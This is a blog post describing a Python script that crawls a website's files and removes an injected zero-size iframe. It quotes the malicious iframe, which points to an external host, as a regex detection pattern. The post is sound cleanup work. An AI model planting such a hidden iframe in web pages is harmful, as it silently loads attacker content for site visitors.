Home
Find exploit and remove it with python regular expressions PDF Print E-mail
I had an explot hit a site that wasn't on one of my servers and there wasn't an backup availalbe to resore from. Still having to fix this I decided to write a script to inspect all the files and remove the bad text. Mostly the exploit appended an iframe at the end of files, but I wrote my script to remove particular text no matter where it sat in the file.

I wrote a bit about a python file structure crawler and I'll include my whole method below for reference.


#!/bin/env python
# By Josh White
#This script will start at the current directory and remove the expliot text
#from all of the files in all files and folders


import re
import os
myre = re.compile(r"""<IFRAME src="http://usuarios.arnet.com.ar/alvarezluque/morgan.html" width="0" height="0" frameborder="0"></iframe>""")
log = []
arglist = []
def check(arg,dirname,fnames):
      for file in fnames:
        arg.append(os.path.join(dirname,file))

os.path.walk("./",check, arglist)
for filename in arglist:
  print filename
  if os.path.isfile(filename):
    f = file(filename,"r").read()
    m = myre.search(f)
    if m:
        print "Expliot found in " + filename
        newfile = f[0:m.start()] +  f[m.end():len(f)]
        file(filename,"w").write(newfile)
        log.append(filename + " was repaired")

file("PYLOG.log","w").writelines(log)
 

Basically I compile the bad text as a regular expression, then iterate through every file and search for a match. If a match is found I replace the bad file with the file - bad text. I know this will only find the first instance of the bad text and remove it and if there were more instances in a single file they wouldn't be found. You could make the if myre.search into a recursive function, or just run the script multiple times!
 


Be first to comment this article

Write Comment
  • Please keep the topic of messages relevant to the subject of the article.
  • Personal verbal attacks will be deleted.
  • Please don't use comments to plug your web site. Such material will be removed.
  • Just ensure to *Refresh* your browser for a new security code to be displayed prior to clicking on the 'Send' button.
  • Keep in mind that the above process only applies if you simply entered the wrong security code.
Name:
E-mail
Homepage
Title:
BBCode:Web AddressEmail AddressBold TextItalic TextUnderlined TextQuoteCodeOpen ListList ItemClose List
Comment:

Code:* Code
I wish to be contacted by email regarding additional comments

Powered by AkoComment Tweaked Special Edition v.1.4.6
AkoComment © Copyright 2004 by Arthur Konze - www.mamboportal.com
All right reserved
 
< Prev   Next >
[ Back ]

Under Construction

Jibwa.com is under construction. Watch out for broken links, missing pages, potholes and bulldozers. We apologize for the temporary inconvenience - Jibwa.com Staff

News and Updates

What to do when a website breaks

Once in a while you go to check out your personal website, or to log into your company web email and you can't. For the average person going about...
Read More ...

Find how much ram and processor your computer has

Most people remember buying their computer, and usually there was a point where you had to decide based on price what processor you wanted, and how ...
Read More ...

How to see home much storage/disk space you have left

 Finding out how much space is left on your computer or how much space you have on your computer total is something very simple, but it can also ...
Read More ...

Jibwa and The Future of Computing

The staff and consultants at Jibwa LLC have been tinkering, working with, building, and developing software on compters since long before there was t...
Read More ...